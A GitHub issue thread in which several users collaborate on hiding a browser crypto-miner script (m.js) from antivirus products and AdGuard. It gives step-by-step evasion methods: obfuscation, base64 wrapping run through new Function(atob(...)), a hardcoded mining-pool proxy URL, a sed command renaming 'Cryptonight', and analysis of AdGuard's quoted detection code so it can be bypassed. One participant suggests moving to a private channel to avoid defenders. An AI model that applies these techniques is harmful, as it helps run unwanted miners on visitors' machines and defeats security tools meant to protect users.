Decrypted m.js

[cron13]

hey guys, can u release decrypted version of m.js, I want to recompile it. At the moment many antiviruses detect it as a virus

[cazala]

https://gist.github.com/cazala/50ab1e141736c8a327b26b923a1448e6

[cron13]

Thanks, can you tell us a good utility for obfuscating js? All that I have found so far does not help against some antiviruses :-(

Ikarus PUA.CoinMiner Kaspersky HEUR: Trojan.Script.Generic Symantec PUA.JScoinminer 20171213 ZoneAlarm by Check Point HEUR: Trojan.Script.Generic

[cazala]

Mm i didn't do much, I just used https://javascriptobfuscator.com/ and then converted the whole code to base64, and put it into a new Function(atob("base64source"));

[cazala]

Maybe the source could also be minified before/after obfuscating it.

[cron13]

Thanks, I will experiment. If this works out. then I will write here

[adamdupuis]

To get it undetected by Kaspersky I only hardcoded the proxy and removed the console.log() calls in m.js then obfuscated it using the same website mentioned above. Then I base64 encoded as mentioned above. I would minify it before obfuscating as well.

[cazala]

so @adamdupuis you don't have to load the .js file using the ?proxy= query param right? I believe that's the rule they are using to block it.

[cazala]

because I think it gets blocked even before the file is loaded at all, so it has to do with the url.

[adamdupuis]

In the version where I deobfuscated your m.js I still need to call it with m.js?proxy= but I do not add a value to the parameter. Since modifying CoinHive's code I removed the need for the proxy parameter.

[cazala]

Mm okay then maybe my theory is wrong. But I don't see why you need to pass the ?proxy= query param?

[cazala]

Is it because of the throw new Error("missing '?proxy' query parameter in your proxy url!"); ?

[adamdupuis]

Yes, I was working with your obfuscated m.js and it was too much work to figure out how to remove the need for it completely so I just left it in. Once I ensure my new version is undetected I will use it without needing the proxy parameter.

[cazala]

Okay, let me know if you make any progress :)

[cron13]

adamdupuis solution work, thank you!

So, i hardcode proxyUrl and libUrl like this:

var libUrl = 'http://myserver.com/proxyurl/';
const proxyUrl = 'wss://myserver.com:8892?pool=pool.supportxmr.com:3333';

and remove throw new Error and console.log

Then i minify this by https://www.minifier.org Then obfuscate with https://javascriptobfuscator.com And encode result to base64 And put it into new Function(atob("base64source"))();

[cazala]

nice, i ll update the assets soon

[cron13]

damn, adguard made new filter that detect miner - https://github.com/AdguardTeam/AdguardFilters/blob/8611f98972689e4001b8cb7861e1cab626755b60/EnglishFilter/sections/general_extensions.txt that filter based on js code: if (a instanceof Array && "string" === typeof a[0] && 0 <= a[0].indexOf("Cryptonight")) { as I understand this code is just looking for the word "Cryptonight" in the js files of the site. I try to rename all "Cryptonight", but after this i got errors like failed to asynchronously prepare wasm: TypeError: undefined is not an object (evaluating 'Module["asm"]["_crnt_create"].apply') TypeError: undefined is not an object (evaluating 'Module["asm"]["_crnt_create"].apply')

Any ideas?

[cazala]

I'll look into it during the weekend, but yea i noticed the traffic going thru the proxy decreased in the last days to a 5% from what it has been the last weeks, it's probably these guys getting smarter

[adamdupuis]

If you base64 encode the Javascript, Adguard should not be able to detect if "Cryptonight" is in there - or can it?

[amittell]

Tested this and it stops AdGuard from detecting it.

sed -i 's:Cryptonight:CN:g' m.js

Obviously you need to run this on the decoded m.js, then re-obfuscate and encode it.

[cazala]

I'll make these changes to the assets soon, thanks everyone for helping out :)

[adamdupuis]

Is this just a search and replace?

[amittell]

Yep, working for me and AdGuard doesn't detect it.

https://gist.github.com/amittell/44f868ec729430a9981babe931cef490

[Akuka]

@amittell should you do the same for 'a.js'? its also contains "Cryptonight"

[amittell]

@Akuka I didn't, AdGaurd doesn't seem to detect it as it is.

[cazala]

The a.js file (asmjs) is not used if WebAssembly is supported. You can force the miner to use asm and test if it gets detected by AdGuard by doing this:

var miner = CH.Anonymous('site-key', { forceASMJS: true });
miner.start();

[Worldand]

Avast web shield also detect "Cryptonight"

[Worldand]

With what we need to replace "Cryptonight" ?

[amittell]

Anything that's not "Cryptonight" ;)

In my sed above I just replaced it with "CN".

[Worldand]

Tried but it didn't works(the miner doesn't start)

[adamdupuis]

Yeah the miner won't start for me either when I did a find and replace "cryptonight" to "CRY" - I chose something other than "CN" because I wanted to be able to find it later and "cn" is commonly found throughout the script.

[amittell]

Strange, works for me. What error do you get?

[JBelinchon]

Hi, any chance to modify somehow the wasm file to avoid antivurus?

[adamdupuis]

@amittell I'm getting the error failed to asynchronously prepare wasm: TypeError: Module.asm._CRY_create is undefined

I did a simple search and replace "cryptonight" (case insensitive) to "CRY"

[neverknoww]

@amittell your method is not working anymore, adblock updated their filter. anymore ideas? Many thanks

[amittell]

Yep. Seems like we are fighting a losing battle here.

Can you paste the AdBlock message so we know what they are filtering on?

[neverknoww]

@amittell https://github.com/AdguardTeam/AdguardFilters/tree/master/EnglishFilter/sections

https://github.com/AdguardTeam/AdguardFilters/blob/master/EnglishFilter/sections/general_extensions.txt

they just updated this file. happaned a hour ago. must be this. lets work it out together

[neverknoww]

@amittell https://github.com/AdguardTeam/AdguardFilters/blob/master/EnglishFilter/sections/general_extensions.txt

last line . number 1200

[cron13]

(function() { function d(a, c) { if (a instanceof Array && "string" === typeof a[0] && 0 <= a[0].indexOf("\x5F\x63\x72\x79\x70\x74\x6F\x6E\x69\x67" + "\x68\x74\x5F\x63\x72\x65\x61\x74\x65")) { var b = null; "undefined" === typeof sessionStorage ? b = !1 : "1" === sessionStorage.getItem("_2cr7mr9") ? b = !0 : "0" === sessionStorage.getItem("_2cr7mr9") && (b = !1); if (null == b) { b = window.confirm(g("confirm.miner")); try { if (b) sessionStorage.setItem("_2cr7mr9", "1"); else if (sessionStorage.setItem("_2cr7mr9", "0"), window.confirm(g("confirm.report"))) { var d = window.location.hostname, f = encodeURIComponent(document.referrer); (new Image).src = "https://crypto.adguard.com/report.png?host=" + d + "&ref=" + f } } catch (k) {} } if (!b) return new e(["/* Suppressed */"], c) } return new e(a, c) } if ("function" === typeof Blob) { var f = { "confirm.miner": 'AdGuard has detected an attempt by this website to use your browser as a crypto-currency miner. It can create significant CPU load. Press "Cancel" to prevent it.', "confirm.report": 'We are collecting all the information about the websites engaged in hidden crypto-mining. Press "OK" to send an automatic report about this website.' }, h = { "confirm.miner": 'AdGuard \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b, \u0447\u0442\u043e \u044d\u0442\u043e\u0442 \u0441\u0430\u0439\u0442 \u043f\u044b\u0442\u0430\u0435\u0442\u0441\u044f \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0432\u0430\u0448 \u0431\u0440\u0430\u0443\u0437\u0435\u0440 \u0434\u043b\u044f \u0434\u043e\u0431\u044b\u0447\u0438 \u043a\u0440\u0438\u043f\u0442\u043e\u0432\u0430\u043b\u044e\u0442\u044b. \u042d\u0442\u043e \u043c\u043e\u0436\u0435\u0442 \u0441\u043e\u0437\u0434\u0430\u0442\u044c \u0437\u0430\u043c\u0435\u0442\u043d\u0443\u044e \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0443 \u043d\u0430 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u043e\u0440. \u041d\u0430\u0436\u043c\u0438\u0442\u0435 "\u041e\u0442\u043c\u0435\u043d\u0430", \u0447\u0442\u043e\u0431\u044b \u0437\u0430\u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u044d\u0442\u0443 \u043f\u043e\u043f\u044b\u0442\u043a\u0443.', "confirm.report": '\u041c\u044b \u0441\u043e\u0431\u0438\u0440\u0430\u0435\u043c \u0434\u0430\u043d\u043d\u044b\u0435 \u043e\u0431\u043e \u0432\u0441\u0435\u0445 \u0441\u0430\u0439\u0442\u0430\u0445, \u0437\u0430\u043c\u0435\u0447\u0435\u043d\u043d\u044b\u0445 \u0432 \u043f\u043e\u043f\u044b\u0442\u043a\u0430\u0445 \u0441\u043a\u0440\u044b\u0442\u043e\u0433\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f \u0440\u0435\u0441\u0443\u0440\u0441\u043e\u0432 \u0432\u0430\u0448\u0435\u0433\u043e \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430. \u041d\u0430\u0436\u043c\u0438\u0442\u0435 "\u041e\u041a" \u0447\u0442\u043e\u0431\u044b \u043e\u0442\u043f\u0440\u0430\u0432\u0438\u0442\u044c \u043d\u0430\u043c \u0430\u0432\u0442\u043e\u043c\u0430\u0442\u0438\u0447\u0435\u0441\u043a\u043e\u0435 \u0443\u0432\u0435\u0434\u043e\u043c\u043b\u0435\u043d\u0438\u0435 \u043e\u0431 \u044d\u0442\u043e\u043c \u0441\u0430\u0439\u0442\u0435.' }, g = function(a) { var c = navigator.language; return c && 0 === c.indexOf("ru") ? h[a] : f[a] }, e = Blob; d.prototype = e.prototype; window.Blob = d } })();

what happens if execute sessionStorage.setItem ("_ 2cr7mr9", "1") on top of the page ?

[cazala]

they are looking for this piece in the obfuscated code, right?

a[0].indexOf("\x5F\x63\x72\x79\x70\x74\x6F\x6E\x69\x67"+"\x68\x74\x5F\x63\x72\x65\x61\x74\x65")

[cron13]

yeah, console.log("\x5F\x63\x72\x79\x70\x74\x6F\x6E\x69\x67"+"\x68\x74\x5F\x63\x72\x65\x61\x74\x65") _cryptonight_create

[cazala]

okay, we know what we need to rename

[cron13]

can we create a private discussion about avoidance adblock? Maybe I'm paranoid, but I think they are reading this thread :-/

[neverknoww]

add me please . thanks

[adamdupuis]

It shouldn't matter as long as the variables can be renamed to something generic that cannot be blocked without affecting other sites/scripts that shouldn't be blocked. The main issue is not being able to rename all instances of "cryptonight" without being able to rename it in the wasm file.

[neverknoww]

adamdupuis there are things hardcoded in the .wasm file. Not until someone rewrite the entire program, eventunly they will able to block us out entirely. at that moment, no matter what you change, it wudnt work

[adamdupuis]

Yes, that is what I'm saying. There's no need to go private though.

[cron13]

how hard will it be to compile some kind of miner engine under the webassembly?

[neverknoww]

but keeping it private, it will able us to last longer without keep changing the code until its game over to everyone

[adamdupuis]

Sounds like it already is...

[cazala]

even if we can't change the wasm, we can change the client to hide the API. and we can even mine without using wasm too, there's still asmjs. let me play with it for a bit, i'll write back.